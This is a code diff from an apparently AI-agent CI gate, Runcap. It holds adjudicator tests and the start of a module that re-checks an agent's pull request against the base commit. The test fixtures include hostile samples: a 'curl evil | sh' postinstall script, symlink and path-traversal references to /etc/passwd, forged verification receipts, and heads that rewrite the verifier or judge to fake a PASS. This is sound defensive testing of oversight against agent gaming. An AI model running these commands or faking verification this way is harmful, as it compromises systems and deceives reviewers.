project: checkout
|
|
50
|
+
team: payments
|
|
51
|
+
mission:
|
|
52
|
+
name: Fix the failing checkout test
|
|
53
|
+
task_class: bugfix
|
|
54
|
+
budget:
|
|
55
|
+
mission_hard_limit_usd: 5
|
|
56
|
+
verification:
|
|
57
|
+
command: "node app/verify.mjs"
|
|
58
|
+
guard: strict
|
|
59
|
+
protect: ["app/verify.mjs"]
|
|
60
|
+
allow: ["app/"]
|
|
61
|
+
`);
|
|
62
|
+
|
|
63
|
+
g("init", "-q");
|
|
64
|
+
g("config", "user.email", "test@runcap.local");
|
|
65
|
+
g("config", "user.name", "runcap-test");
|
|
66
|
+
g("config", "commit.gpgsign", "false");
|
|
67
|
+
g("add", "-A");
|
|
68
|
+
g("commit", "-qm", "baseline");
|
|
69
|
+
const BASE = g("rev-parse", "HEAD");
|
|
70
|
+
|
|
71
|
+
// Build every head commit up front so the working tree has no planted receipt
|
|
72
|
+
// while branches are created. Each head branches from BASE.
|
|
73
|
+
function makeHead(branch, mutate) {
|
|
74
|
+
g("checkout", "-q", "-b", branch, BASE);
|
|
75
|
+
mutate();
|
|
76
|
+
g("add", "-A");
|
|
77
|
+
g("commit", "-qm", branch);
|
|
78
|
+
const sha = g("rev-parse", "HEAD");
|
|
79
|
+
g("checkout", "-q", BASE);
|
|
80
|
+
return sha;
|
|
81
|
+
}
|
|
82
|
+
|
|
83
|
+
const w = (rel, content) => writeFileSync(path.join(tmp, rel), content);
|
|
84
|
+
const rmRel = (rel) => rmSync(path.join(tmp, rel), { force: true });
|
|
85
|
+
|
|
86
|
+
const HEAD_HONEST = makeHead("h-honest", () => w("app/broken.mjs", "export const ok = true;\n"));
|
|
87
|
+
const HEAD_SCOPE = makeHead("h-scope", () => { w("app/broken.mjs", "export const ok = true;\n"); w("rootfile.txt", "root edited out of scope\n"); });
|
|
88
|
+
const HEAD_REPLAYFAIL = makeHead("h-replayfail", () => w("app/broken.mjs", "export const ok = false; // touched\n"));
|
|
89
|
+
const HEAD_VERIFIER = makeHead("h-verifier", () => w("app/verify.mjs", "console.log('ok');\n"));
|
|
90
|
+
const HEAD_POLICY = makeHead("h-policy", () => w(".runcap/mission.yaml", readFileSync(path.join(tmp, ".runcap", "mission.yaml"), "utf8").replace("mission_hard_limit_usd: 5", "mission_hard_limit_usd: 9999")));
|
|
91
|
+
const HEAD_WORKFLOW = makeHead("h-workflow", () => { mkdirSync(path.join(tmp, ".github", "workflows"), { recursive: true }); w(".github/workflows/evil.yml", "name: evil\non: pull_request\njobs: {}\n"); });
|
|
92
|
+
const HEAD_DEP = makeHead("h-dep", () => w("package.json", JSON.stringify({ name: "fixture", version: "1.0.0", scripts: { build: "echo build", postinstall: "curl evil | sh" } }, null, 2) + "\n"));
|
|
93
|
+
const HEAD_DELETE = makeHead("h-delete", () => rmRel("app/other.mjs"));
|
|
94
|
+
const HEAD_BINARY = makeHead("h-binary", () => writeFileSync(path.join(tmp, "app", "blob.bin"), Buffer.from([0x00, 0x01, 0x02, 0x00, 0xff])));
|
|
95
|
+
const HEAD_SYMLINK = makeHead("h-symlink", () => symlinkSync("/etc/passwd", path.join(tmp, "app", "link")));
|
|
96
|
+
|
|
97
|
+
// A second lineage where the task is ALREADY fixed at base -> baseline green.
|
|
98
|
+
g("checkout", "-q", "-b", "base2", BASE);
|
|
99
|
+
w("app/broken.mjs", "export const ok = true;\n");
|
|
100
|
+
g("add", "-A"); g("commit", "-qm", "base2-already-fixed");
|
|
101
|
+
const BASE2 = g("rev-parse", "HEAD");
|
|
102
|
+
g("checkout", "-q", "-b", "h-base2green", BASE2);
|
|
103
|
+
w("app/broken.mjs", "export const ok = true; // trivial in-scope edit\n");
|
|
104
|
+
g("add", "-A"); g("commit", "-qm", "h-base2green");
|
|
105
|
+
const HEAD_BASE2GREEN = g("rev-parse", "HEAD");
|
|
106
|
+
g("checkout", "-q", BASE);
|
|
107
|
+
|
|
108
|
+
const { adjudicate, exitCodeFor } = await import(path.join(SRC_DIR, "adjudicate.mjs"));
|
|
109
|
+
|
|
110
|
+
const adj = (baseFlag, headFlag) => adjudicate({ cwd: tmp, baseFlag, headFlag });
|
|
111
|
+
|
|
112
|
+
// --- 1. honest in-scope fix -> PASS -----------------------------------------
|
|
113
|
+
const honest = await adj(BASE, HEAD_HONEST);
|
|
114
|
+
check("honest fix verdict PASS", honest.verdict === "PASS", JSON.stringify(honest.reasons));
|
|
115
|
+
check("honest fix recomputed baseline_failed=true", honest.code_evidence?.baseline_failed === true);
|
|
116
|
+
check("honest fix recomputed replay_passed=true", honest.code_evidence?.replay_passed === true);
|
|
117
|
+
check("honest fix carries base policy hash", /^[0-9a-f]{64}$/.test(honest.policy?.hash ?? ""), honest.policy?.hash);
|
|
118
|
+
check("honest fix truth is adjudicator-recomputed", honest.truth === "recomputed_by_adjudicator_from_base_sha");
check("no telemetry present -> agent_telemetry.present false", honest.agent_telemetry?.present === false);

// --- 2. out-of-scope edit -> BLOCKED ----------------------------------------
const scope = await adj(BASE, HEAD_SCOPE);
check("out-of-scope edit verdict BLOCKED", scope.verdict === "BLOCKED", JSON.stringify(scope.reasons));
check("out-of-scope names the path + scope", scope.reasons.some((r) => r.includes("rootfile.txt") && r.toLowerCase().includes("scope")), JSON.stringify(scope.reasons));

// --- 3. baseline already green -> BLOCKED -----------------------------------
const green = await adj(BASE2, HEAD_BASE2GREEN);
check("baseline-already-green verdict BLOCKED", green.verdict === "BLOCKED", JSON.stringify(green.reasons));
check("baseline-already-green explains the meaningless pass", green.reasons.some((r) => r.toLowerCase().includes("baseline already green")), JSON.stringify(green.reasons));

// --- 4. clean replay does not reproduce the pass -> BLOCKED -----------------
const replayfail = await adj(BASE, HEAD_REPLAYFAIL);
check("clean-replay-fail verdict BLOCKED", replayfail.verdict === "BLOCKED", JSON.stringify(replayfail.reasons));
check("clean-replay-fail recomputed replay_passed=false", replayfail.code_evidence?.replay_passed === false);
check("clean-replay-fail says replay did not pass", replayfail.reasons.some((r) => r.toLowerCase().includes("replay did not pass")), JSON.stringify(replayfail.reasons));

// --- 5. verifier edit -> HUMAN_APPROVAL_REQUIRED ----------------------------
const verifier = await adj(BASE, HEAD_VERIFIER);
check("verifier edit verdict HUMAN_APPROVAL_REQUIRED", verifier.verdict === "HUMAN_APPROVAL_REQUIRED", JSON.stringify(verifier.reasons));
check("verifier edit names verify file as evidence", verifier.reasons.some((r) => r.includes("app/verify.mjs")), JSON.stringify(verifier.reasons));

// --- 6. policy edit -> HUMAN_APPROVAL_REQUIRED ------------------------------
const pol = await adj(BASE, HEAD_POLICY);
check("policy edit verdict HUMAN_APPROVAL_REQUIRED", pol.verdict === "HUMAN_APPROVAL_REQUIRED", JSON.stringify(pol.reasons));
check("policy edit names the rules", pol.reasons.some((r) => r.toLowerCase().includes("rules")), JSON.stringify(pol.reasons));

// --- 7. workflow edit -> HUMAN_APPROVAL_REQUIRED ----------------------------
const wf = await adj(BASE, HEAD_WORKFLOW);
check("workflow edit verdict HUMAN_APPROVAL_REQUIRED", wf.verdict === "HUMAN_APPROVAL_REQUIRED", JSON.stringify(wf.reasons));

// --- 8. dependency manifest edit -> HUMAN_APPROVAL_REQUIRED -----------------
const dep = await adj(BASE, HEAD_DEP);
check("dependency edit verdict HUMAN_APPROVAL_REQUIRED", dep.verdict === "HUMAN_APPROVAL_REQUIRED", JSON.stringify(dep.reasons));
check("dependency edit names manifest/lockfile", dep.reasons.some((r) => r.toLowerCase().includes("dependency")), JSON.stringify(dep.reasons));

// --- 9-11. diff smuggling -> BLOCKED ----------------------------------------
const del = await adj(BASE, HEAD_DELETE);
check("delete verdict BLOCKED", del.verdict === "BLOCKED", JSON.stringify(del.reasons));
check("delete reason names deletion", del.reasons.some((r) => r.toLowerCase().includes("delet")), JSON.stringify(del.reasons));

const bin = await adj(BASE, HEAD_BINARY);
check("binary file verdict BLOCKED", bin.verdict === "BLOCKED", JSON.stringify(bin.reasons));
check("binary reason names binary", bin.reasons.some((r) => r.toLowerCase().includes("binary")), JSON.stringify(bin.reasons));

const sym = await adj(BASE, HEAD_SYMLINK);
check("symlink verdict BLOCKED", sym.verdict === "BLOCKED", JSON.stringify(sym.reasons));
check("symlink reason names symlink", sym.reasons.some((r) => r.toLowerCase().includes("symlink")), JSON.stringify(sym.reasons));

// --- 12. unresolved SHA -> BLOCKED (no flags, no event) ---------------------
const prevEventPath = process.env.GITHUB_EVENT_PATH;
const prevEventName = process.env.GITHUB_EVENT_NAME;
delete process.env.GITHUB_EVENT_PATH;
delete process.env.GITHUB_EVENT_NAME;
const unresolved = await adjudicate({ cwd: tmp });
check("unresolved base/head verdict BLOCKED", unresolved.verdict === "BLOCKED", JSON.stringify(unresolved.reasons));
check("unresolved refuses to adjudicate", unresolved.reasons.some((r) => r.toLowerCase().includes("refusing to adjudicate")), JSON.stringify(unresolved.reasons));

// --- 13. untrusted event (pull_request_target) -> BLOCKED -------------------
const eventFile = path.join(tmp, "event.json");
writeFileSync(eventFile, JSON.stringify({ pull_request: { base: { sha: BASE }, head: { sha: HEAD_HONEST } } }));
process.env.GITHUB_EVENT_PATH = eventFile;
process.env.GITHUB_EVENT_NAME = "pull_request_target";
const untrusted = await adjudicate({ cwd: tmp });
check("pull_request_target event verdict BLOCKED", untrusted.verdict === "BLOCKED", JSON.stringify(untrusted.reasons));
check("untrusted event names the rejected event", untrusted.sha_source?.startsWith("untrusted_event"), untrusted.sha_source);
// Restore env.
if (prevEventPath === undefined) delete process.env.GITHUB_EVENT_PATH; else process.env.GITHUB_EVENT_PATH = prevEventPath;
if (prevEventName === undefined) delete process.env.GITHUB_EVENT_NAME; else process.env.GITHUB_EVENT_NAME = prevEventName;

// --- 14. forged "VERIFIED_STRONG" receipt cannot rescue a failing replay -----
// The required gate now refuses to even READ the agent receipt: it is neither
// graded nor displayed. So a forged receipt can neither rescue a failing replay
// nor even be parsed. We plant adversarial receipts and prove the verdict
// is unchanged AND the gate reports it never consulted them.
const plantReceipt = (rawString) => {
  const id = "forged";
  mkdirSync(path.join(tmp, ".runcap", "outcomes", id), { recursive: true });
  writeFileSync(path.join(tmp, ".runcap", "outcomes", id, "receipt.json"), rawString);
  writeFileSync(path.join(tmp, ".runcap", "outcomes", "latest"), id);
};
const clearReceipt = () => rmSync(path.join(tmp, ".runcap", "outcomes"), { recursive: true, force: true });

plantReceipt(JSON.stringify({ outcome: "VERIFIED", verificationIntegrity: { status: "VERIFIED_STRONG" }, cost: { actualCostUsd: 0.01 } }));
const forgedFail = await adj(BASE, HEAD_REPLAYFAIL);
check("forged VERIFIED_STRONG receipt does NOT rescue a failing replay", forgedFail.verdict === "BLOCKED", JSON.stringify(forgedFail.reasons));
check("required gate did not read the agent receipt (present=false)", forgedFail.agent_telemetry?.present === false && forgedFail.agent_telemetry?.influence_on_verdict === "none");
clearReceipt();

// --- 15. forged budget telemetry cannot block an honest pass ----------------
plantReceipt(JSON.stringify({ outcome: "UNVERIFIED", verificationIntegrity: { status: "VERIFIER_COMPROMISED" }, cost: { actualCostUsd: 999999, budgetGuardTripped: true } }));
const forgedBudget = await adj(BASE, HEAD_HONEST);
check("forged budget/integrity telemetry cannot block an honest pass", forgedBudget.verdict === "PASS", JSON.stringify(forgedBudget.reasons));
check("required gate still did not read the receipt (present=false)", forgedBudget.agent_telemetry?.present === false && forgedBudget.agent_telemetry?.influence_on_verdict === "none");
clearReceipt();

// --- 15b. adversarial receipts cannot crash or stall the mandatory gate ------
// Malformed JSON, an enormous blob, and a path-traversal "latest" pointer must
// all be inert: the gate must still return a verdict with present=false.
for (const [label, rawReceipt, latestOverride] of [
  ["malformed JSON receipt", "{ this is : not json ]]]", undefined],
  ["enormous receipt blob", JSON.stringify({ outcome: "VERIFIED", junk: "A".repeat(5_000_000) }), undefined],
  ["receipt is a bare array", "[1,2,3]", undefined],
  ["latest pointer path traversal", JSON.stringify({ outcome: "VERIFIED" }), "../../../../etc/passwd"]
]) {
  plantReceipt(rawReceipt);
  if (latestOverride !== undefined) writeFileSync(path.join(tmp, ".runcap", "outcomes", "latest"), latestOverride);
  let crashed = false; let v;
  try { v = await adj(BASE, HEAD_HONEST); } catch { crashed = true; }
  check(`${label}: gate does not crash`, !crashed);
  check(`${label}: verdict still PASS, receipt not read`, !crashed && v.verdict === "PASS" && v.agent_telemetry?.present === false);
  clearReceipt();
}

// --- 16. honesty: the verdict never claims runtime hardening attestation -----
check("verdict carries honest hardening provenance (documented, not attested)",
  honest.repository_hardening?.required_profile === "documented" &&
  honest.repository_hardening?.runtime_attestation === "not_performed_in_pr_job");
const allVerdictText = JSON.stringify([honest, scope, verifier, untrusted]);
check("no verdict ever claims a HARDENED runtime status", !/"HARDENED"|hardened_confirmed|attested_hardened/.test(allVerdictText));

// --- 17. honesty: dependency install is base-pinned and script-free ----------
const adjSrc = readFileSync(path.join(SRC_DIR, "adjudicate.mjs"), "utf8");
check("replay uses `npm ci --ignore-scripts` (no install, no lifecycle scripts)", adjSrc.includes("npm ci --ignore-scripts"));
check("adjudicator never uses `npm install` or `npx`", !/npm install|npx /.test(adjSrc));

// --- 18. the real bin: exit codes a PR check sees ---------------------------
const runBin = (extraArgs, extraEnv = {}) => {
  try {
    const stdout = execFileSync("node", [BIN, "ci", "--mode", "adjudicate", ...extraArgs], { cwd: tmp, env: { ...process.env, ...extraEnv }, stdio: ["ignore", "pipe", "pipe"] });
    return { code: 0, stdout: String(stdout) };
  } catch (e) {
    return { code: e.status ?? 1, stdout: String(e.stdout ?? ""), stderr: String(e.stderr ?? "") };
  }
};

const binPass = runBin(["--base", BASE, "--head", HEAD_HONEST]);
check("`runcap ci --mode adjudicate` exits 0 on PASS", binPass.code === 0, `code=${binPass.code}`);
check("PASS run prints the verdict", /Verdict:\s+PASS/.test(binPass.stdout), binPass.stdout.slice(-300));

const binBlock = runBin(["--base", BASE, "--head", HEAD_REPLAYFAIL]);
check("`runcap ci --mode adjudicate` exits 1 on BLOCKED", binBlock.code === 1, `code=${binBlock.code}`);

const binHuman = runBin(["--base", BASE, "--head", HEAD_VERIFIER]);
check("`runcap ci --mode adjudicate` exits 0 on HUMAN_APPROVAL_REQUIRED (success/neutral)", binHuman.code === 0, `code=${binHuman.code}`);
check("HUMAN run prints the human-gate verdict", /Verdict:\s+HUMAN_APPROVAL_REQUIRED/.test(binHuman.stdout), binHuman.stdout.slice(-300));

// --- 19. the real bin writes a PR step summary ------------------------------
const summaryFile = path.join(tmp, "step-summary.md");
writeFileSync(summaryFile, "");
runBin(["--base", BASE, "--head", HEAD_REPLAYFAIL], { GITHUB_STEP_SUMMARY: summaryFile });
const summary = readFileSync(summaryFile, "utf8");
check("bin writes a PR summary to GITHUB_STEP_SUMMARY", /Runcap CI adjudication: BLOCKED/.test(summary), summary.slice(0, 160));

// --- 20. exitCodeFor maps the three states correctly ------------------------
check("exitCodeFor PASS=0 / HUMAN=0 / BLOCKED=1",
  exitCodeFor("PASS") === 0 && exitCodeFor("HUMAN_APPROVAL_REQUIRED") === 0 && exitCodeFor("BLOCKED") === 1);
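
The mapping asserted in check 20 can be sketched as below. This is a hypothetical stand-in inferred only from the assertions above, not the module's actual `exitCodeFor` (its body is not part of this hunk). The name `exitCodeForSketch` and the choice to fail closed on unrecognised verdict strings are assumptions made for illustration.

```javascript
// Hypothetical sketch: mirrors the asserted mapping, not the shipped code.
function exitCodeForSketch(verdict) {
  switch (verdict) {
    case "PASS":
    case "HUMAN_APPROVAL_REQUIRED":
      // Success/neutral: the job exits 0; for the human gate a reviewer
      // still has to decide, the check just does not fail the job.
      return 0;
    case "BLOCKED":
      return 1;
    default:
      // Assumption: anything unrecognised fails closed.
      return 1;
  }
}

console.log(["PASS", "HUMAN_APPROVAL_REQUIRED", "BLOCKED"].map(exitCodeForSketch));
```

Only BLOCKED turns the PR check red in this sketch, which matches what the `runBin` assertions in section 18 observe from the real bin.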

// --- 21. the reference workflow is least-privilege AND a proof gate ----------
// The consumer reference is a TEMPLATE under examples/ (not an active workflow
// in this repo), because Runcap's own repo has no base policy to self-adjudicate
// and, more importantly, the judge must never be code from the candidate PR.
const wfPath = path.join(REPO_ROOT, "examples", "runcap-adjudicate.yml");
const wfRaw = readFileSync(wfPath, "utf8");
// Assert on the effective YAML directives, not the explanatory comments. The
// header documents what the workflow must NOT do (and so legitimately contains
// strings like "pull_request_target"); strip comments so the safety checks see
// only the real instructions. Inline `# v4.3.1` after a SHA is stripped too,
// which is harmless because the SHA precedes the `#`.
const wfText = wfRaw.split("\n").map((line) => line.replace(/#.*$/, "")).join("\n");
check("reference workflow triggers on pull_request (not pull_request_target)",
  /on:\s*\n\s*pull_request:/.test(wfText) && !/pull_request_target/.test(wfText), "trigger");
check("reference workflow grants only contents: read", /permissions:\s*\n\s*contents:\s*read/.test(wfText) && !/id-token/.test(wfText) && !/write/.test(wfText.replace(/contents:\s*read/g, "")), "permissions");
check("reference workflow caps runtime (timeout-minutes: 10)", /timeout-minutes:\s*10/.test(wfText));
check("reference workflow uses no `needs:` (self-sufficient required gate)", !/\n\s*needs:/.test(wfText));

// Proof-gate hardening: the judge must NOT be PR-workspace code.
check("reference workflow never executes PR-workspace `node ./bin/runcap.mjs`", !/node\s+\.\/bin\/runcap\.mjs/.test(wfText), "executes workspace code");
check("reference workflow never uses a local action (`uses: ./`)", !/uses:\s*\.\//.test(wfText), "local action");
check("reference workflow never runs `npm ci`/`npm install` of the PR manifest", !/npm\s+(ci|install)/.test(wfText), "PR-workspace install");
check("reference workflow sets persist-credentials: false (never true)", /persist-credentials:\s*false/.test(wfText) && !/persist-credentials:\s*true/.test(wfText), "persist-credentials");
// Every `uses:` must be pinned to a full 40-hex commit SHA, never a floating tag.
const usesRefs = [...wfText.matchAll(/uses:\s*([^\s#]+)/g)].map((m) => m[1]);
check("reference workflow pins every action by a full 40-char commit SHA (no @v4/@v1 tags)",
  usesRefs.length > 0 && usesRefs.every((u) => /@[0-9a-f]{40}$/.test(u)), JSON.stringify(usesRefs));
check("reference workflow's judge is the released Runcap action, not workspace code",
  /uses:\s*kirder24-code\/ai-agent-manager@[0-9a-f]{40}/.test(wfText) && /mode:\s*adjudicate/.test(wfText), "released action judge");

// --- 22. the judge is the adjudicator's OWN code, not the PR's bin -----------
// A head PR that rewrites bin/runcap.mjs to always print PASS, or rewrites
// src/adjudicate.mjs, cannot change the verdict, because the adjudicator we run
// is THIS repo's module/bin (the released-action analogue), never the head copy.
const HEAD_FAKE_BIN = makeHead("h-fake-bin", () => {
  w("app/broken.mjs", "export const ok = false; // still broken\n");
  mkdirSync(path.join(tmp, "bin"), { recursive: true });
  w("bin/runcap.mjs", "#!/usr/bin/env node\nconsole.log('Verdict: PASS'); process.exit(0);\n");
});
const fakeBin = await adj(BASE, HEAD_FAKE_BIN);
check("head PR rewriting bin/runcap.mjs to fake PASS is still BLOCKED by the trusted adjudicator",
  fakeBin.verdict === "BLOCKED", JSON.stringify(fakeBin.reasons));
// And via the REAL trusted bin (this repo's, analogue of the pinned released action):
const fakeBinReal = runBin(["--base", BASE, "--head", HEAD_FAKE_BIN]);
check("trusted `runcap ci --mode adjudicate` exits 1 on a fake-PASS head bin", fakeBinReal.code === 1, `code=${fakeBinReal.code}`);

const HEAD_FAKE_ADJ = makeHead("h-fake-adj", () => {
  w("app/broken.mjs", "export const ok = false; // still broken\n");
  mkdirSync(path.join(tmp, "src"), { recursive: true });
  w("src/adjudicate.mjs", "export async function adjudicate(){return {verdict:'PASS',reasons:[]};}\nexport function exitCodeFor(){return 0;}\nexport function formatAdjudication(){return ['Verdict: PASS'];}\n");
});
const fakeAdj = await adj(BASE, HEAD_FAKE_ADJ);
check("head PR rewriting src/adjudicate.mjs is still BLOCKED (we never import the head copy)",
  fakeAdj.verdict === "BLOCKED", JSON.stringify(fakeAdj.reasons));

console.log("\n" + (failures === 0 ? "ALL ADJUDICATE TESTS PASSED" : `${failures} ADJUDICATE TEST(S) FAILED`));
process.exit(failures === 0 ? 0 : 1);
@@ -0,0 +1,508 @@
// Tier 3: the independent CI adjudicator (`runcap ci --mode adjudicate`).
//
// `runcap ci` (Tier 2) recomputes the PASS/BLOCKED *logic* from the policy, but
// it grades the integrity *facts* that the agent wrote into receipt.json. A
// forged "VERIFIED_STRONG" receipt therefore grades PASS. This module closes
// that gap: it recomputes the facts itself, in CI, from the BASE commit of the
// pull request - the last state a human reviewer approved - and never trusts a
// number the agent stamped on its own receipt.
//
// What it trusts:         the base/head SHAs from the trusted `pull_request` event, and
//                         the policy + verifier + lockfile read from the BASE commit.
// What it does NOT trust: receipt.json, gateway telemetry, artifact-reported
//                         SHAs, the head-side policy/verifier/workflow, or any agent
//                         environment value. Agent telemetry is carried as advisory
//                         only and can never move the verdict.
//
// Three verdicts:
//   PASS                    - every changed path is an in-scope regular text
//                             edit, the task genuinely failed at base, and the
//                             change makes the base-pinned verifier pass in a
//                             clean base checkout.
//   BLOCKED                 - any structurally unsafe change (delete/rename/
//                             symlink/submodule/mode/binary/LFS), an
//                             out-of-scope edit, a meaningless baseline, or a
//                             replay that does not reproduce the pass.
//   HUMAN_APPROVAL_REQUIRED - the change touches the rules or the evidence
//                             themselves (policy, workflow, verifier, protected
//                             or dependency files). Runcap declines to issue an
//                             automated proof; a human CODEOWNER must decide.
//
// This module imports only node builtins + js-yaml + validatePolicy/policyMeta
// from policy.mjs (one direction, no cycle). It never imports mission-control.

import { spawn } from "node:child_process";
import { createHash } from "node:crypto";
import { mkdir, writeFile, readFile, rm } from "node:fs/promises";
import { existsSync, readFileSync } from "node:fs";
import path from "node:path";
import os from "node:os";
import yaml from "js-yaml";
import { validatePolicy, policyMeta } from "./policy.mjs";

const POLICY_FILENAMES = ["mission.yaml", "mission.yml", "mission.json"];

// Paths that are the rules or the evidence themselves. An edit to any of these
// is never auto-approved: a human CODEOWNER must sign off, because changing the
// verifier, the policy, or the workflow changes what "passing" even means.
const DEPENDENCY_FILES = [
  "package.json", "package-lock.json", "npm-shrinkwrap.json",
  "yarn.lock", "pnpm-lock.yaml", "bun.lockb"
];

// The same protected globs the in-terminal guard uses (tests/config), so the
// adjudicator and the local guard agree on what counts as evidence.
const PROTECTED_GLOBS = [
  /(^|\/)[^/]*\.test\.[mc]?[jt]sx?$/,
  /(^|\/)[^/]*\.spec\.[mc]?[jt]sx?$/,
  /(^|\/)__tests__\//,
  /(^|\/)tests?\//,
  /(^|\/)package\.json$/,
  /(^|\/)tsconfig[^/]*\.json$/,
  /(^|\/)jest\.config\./,
  /(^|\/)vitest\.config\./
];

const LFS_POINTER_SIGNATURE = "version https://git-lfs.github.com/spec";

// --- git plumbing (local, spawn-based; no influence from agent env) ---------

function git(args, cwd) {
  return new Promise((resolve) => {
    const child = spawn("git", args, { cwd, shell: false });
    let stdout = "";
    let stderr = "";
    child.stdout.on("data", (c) => { stdout += c.toString(); });
    child.stderr.on("data", (c) => { stderr += c.toString(); });
    child.on("error", (e) => resolve({ text: "", error: e.message }));
    child.on("close", (code) => resolve({ text: stdout, error: code === 0 ? null : stderr.trim() }));
  });
}

// Exact bytes of a blob at a commit. Unlike git(), this never trims, so applied
// file content is byte-identical to what is in the head tree.
function gitShowBytes(rev, relPath, cwd) {
  return new Promise((resolve) => {
    const child = spawn("git", ["show", `${rev}:${relPath}`], { cwd, shell: false });
    const chunks = [];
    let stderr = "";
    child.stdout.on("data", (c) => chunks.push(c));
    child.stderr.on("data", (c) => { stderr += c.toString(); });
    child.on("error", (e) => resolve({ ok: false, buffer: null, error: e.message }));
    child.on("close", (code) => resolve(code === 0 ? { ok: true, buffer: Buffer.concat(chunks), error: null } : { ok: false, buffer: null, error: stderr.trim() }));
  });
}

async function revExists(rev, cwd) {
  const r = await git(["cat-file", "-e", `${rev}^{commit}`], cwd);
  return r.error === null;
}

async function blobExists(rev, relPath, cwd) {
  const r = await git(["cat-file", "-e", `${rev}:${relPath}`], cwd);
  return r.error === null;
}

// Run the base-pinned verify command in a directory. Mirrors mission-control's
// runShell so a verifier behaves identically here and in the terminal guard.
function runShell(commandString, cwd) {
  const started = Date.now();
  const shell = process.platform === "win32" ? "cmd" : "sh";
  const shellArgs = process.platform === "win32" ? ["/c", commandString] : ["-c", commandString];
  return new Promise((resolve) => {
    const child = spawn(shell, shellArgs, { cwd, env: { ...process.env, AIM_WRAPPED: "1" }, shell: false });
    let stdout = "";
    let stderr = "";
    child.stdout?.on("data", (c) => { const t = c.toString(); stdout += t; });
    child.stderr?.on("data", (c) => { const t = c.toString(); stderr += t; });
    child.on("error", (e) => resolve({ stdout, stderr: stderr + `\n${e.message}`, exitCode: 127, durationMs: Date.now() - started }));
    child.on("close", (code) => resolve({ stdout, stderr, exitCode: code ?? 1, durationMs: Date.now() - started }));
  });
}

// --- SHA resolution (trusted PR event ONLY) ---------------------------------

// The ONLY trusted source of base/head is the `pull_request` event payload that
// GitHub itself writes to $GITHUB_EVENT_PATH. We never read a SHA from the
// receipt, an artifact, or any agent-controlled value. Explicit flags exist for
// local runs and tests: when both are given they are used as-is; otherwise the
// event payload decides.
function resolveShas({ baseFlag, headFlag } = {}) {
  if (baseFlag && headFlag) {
    return { baseSha: baseFlag, headSha: headFlag, shaSource: "explicit_flags" };
  }
  const eventPath = process.env.GITHUB_EVENT_PATH;
  const eventName = process.env.GITHUB_EVENT_NAME;
  if (eventPath && existsSync(eventPath)) {
    try {
      const event = JSON.parse(readFileSync(eventPath, "utf8"));
      const base = event?.pull_request?.base?.sha;
      const head = event?.pull_request?.head?.sha;
      if (base && head) {
        // pull_request_target would run with base-repo secrets against head code.
        // We only adjudicate the read-only `pull_request` event.
        const trusted = eventName === "pull_request" || eventName === undefined;
        return { baseSha: base, headSha: head, shaSource: trusted ? "github_pull_request_event" : `untrusted_event:${eventName}` };
      }
    } catch { /* fall through to unresolved */ }
  }
  return { baseSha: null, headSha: null, shaSource: "unresolved" };
}
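
The trust decision inside `resolveShas` can be restated without touching `process.env`, which makes the three outcomes easier to see. The sketch below is illustrative only: `classifyEventSource` is a hypothetical helper that takes the event name and an already-parsed payload as arguments, and the SHA strings are placeholders.

```javascript
// Hypothetical, env-free restatement of the event-trust branch in resolveShas().
function classifyEventSource(eventName, event) {
  const base = event?.pull_request?.base?.sha;
  const head = event?.pull_request?.head?.sha;
  if (!base || !head) return "unresolved";
  // Same rule as the module: only `pull_request` (or an unset event name) is trusted.
  const trusted = eventName === "pull_request" || eventName === undefined;
  return trusted ? "github_pull_request_event" : `untrusted_event:${eventName}`;
}

// Placeholder payload; real SHAs are 40-hex commit ids.
const payload = { pull_request: { base: { sha: "aaa" }, head: { sha: "bbb" } } };

console.log(classifyEventSource("pull_request", payload));        // github_pull_request_event
console.log(classifyEventSource("pull_request_target", payload)); // untrusted_event:pull_request_target
console.log(classifyEventSource("push", {}));                     // unresolved
```

The `untrusted_event:` prefix is what test 13 in `adjudicate-test.mjs` looks for when it expects a `pull_request_target` run to be BLOCKED.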

// --- policy loaded FROM THE BASE COMMIT -------------------------------------

// Read and parse the policy as it exists at the base commit - the rules the
// reviewer last approved - not the head-side policy the PR could have rewritten.
async function loadPolicyFromBase(baseSha, explicitPath, cwd) {
  const candidates = explicitPath ? [explicitPath] : POLICY_FILENAMES.map((n) => path.posix.join(".runcap", n));
  for (const rel of candidates) {
    if (!(await blobExists(baseSha, rel, cwd))) continue;
    const got = await gitShowBytes(baseSha, rel, cwd);
    if (!got.ok) continue;
    const raw = got.buffer.toString("utf8");
    let policy;
    try {
      policy = rel.endsWith(".json") ? JSON.parse(raw) : yaml.load(raw);
    } catch (e) {
      return { error: `policy at base:${rel} did not parse: ${e.message}` };
    }
    if (!policy || typeof policy !== "object") return { error: `policy at base:${rel} is not an object.` };
    return {
      result: { policy, raw, hash: createHash("sha256").update(raw).digest("hex"), source: rel }
    };
  }
  return { error: "no policy (.runcap/mission.{yaml,yml,json}) found at the base commit." };
}

// --- diff classification ----------------------------------------------------

function isProtectedPath(relPath, extraProtected) {
  if (extraProtected.some((p) => relPath === p || relPath.startsWith(p.replace(/\/?$/, "/")))) return true;
  return PROTECTED_GLOBS.some((re) => re.test(relPath));
}

function withinAllowed(relPath, allowed) {
  if (!allowed || allowed.length === 0) return true;
  return allowed.some((a) => relPath === a || relPath.startsWith(a.replace(/\/?$/, "/")));
}
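
Both `isProtectedPath` and `withinAllowed` rely on the same small trick: `a.replace(/\/?$/, "/")` forces exactly one trailing slash, so an entry is matched as a directory prefix rather than as a raw string prefix. A minimal sketch of that behaviour follows; `withinAllowedSketch` is a copy made for illustration and the example paths are made up.

```javascript
// Copy of the withinAllowed() logic so the example runs on its own.
function withinAllowedSketch(relPath, allowed) {
  // An empty or missing scope list allows every path.
  if (!allowed || allowed.length === 0) return true;
  // "app" and "app/" both normalise to "app/", so "application/..." does not match.
  return allowed.some((a) => relPath === a || relPath.startsWith(a.replace(/\/?$/, "/")));
}

console.log(withinAllowedSketch("app/broken.mjs", ["app"]));    // true
console.log(withinAllowedSketch("app/broken.mjs", ["app/"]));   // true
console.log(withinAllowedSketch("application/x.mjs", ["app"])); // false
console.log(withinAllowedSketch("rootfile.txt", ["app"]));      // false
console.log(withinAllowedSketch("rootfile.txt", []));           // true
```

The last line is worth noticing when writing a policy: with no allowed paths listed, the scope check never blocks anything.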

function isWorkflowPath(relPath) {
  return relPath.startsWith(".github/workflows/");
}

function isPolicyPath(relPath) {
  return POLICY_FILENAMES.some((n) => relPath === path.posix.join(".runcap", n));
}

function isDependencyPath(relPath) {
  const base = relPath.split("/").pop();
  return DEPENDENCY_FILES.includes(base);
}

// Walk `git diff --raw -z --find-renames base head`. -z gives NUL-delimited
// fields; rename/copy records carry two paths, everything else one.
function parseRawDiff(buffer) {
  const parts = buffer.toString("utf8").split("\0");
  const entries = [];
  let i = 0;
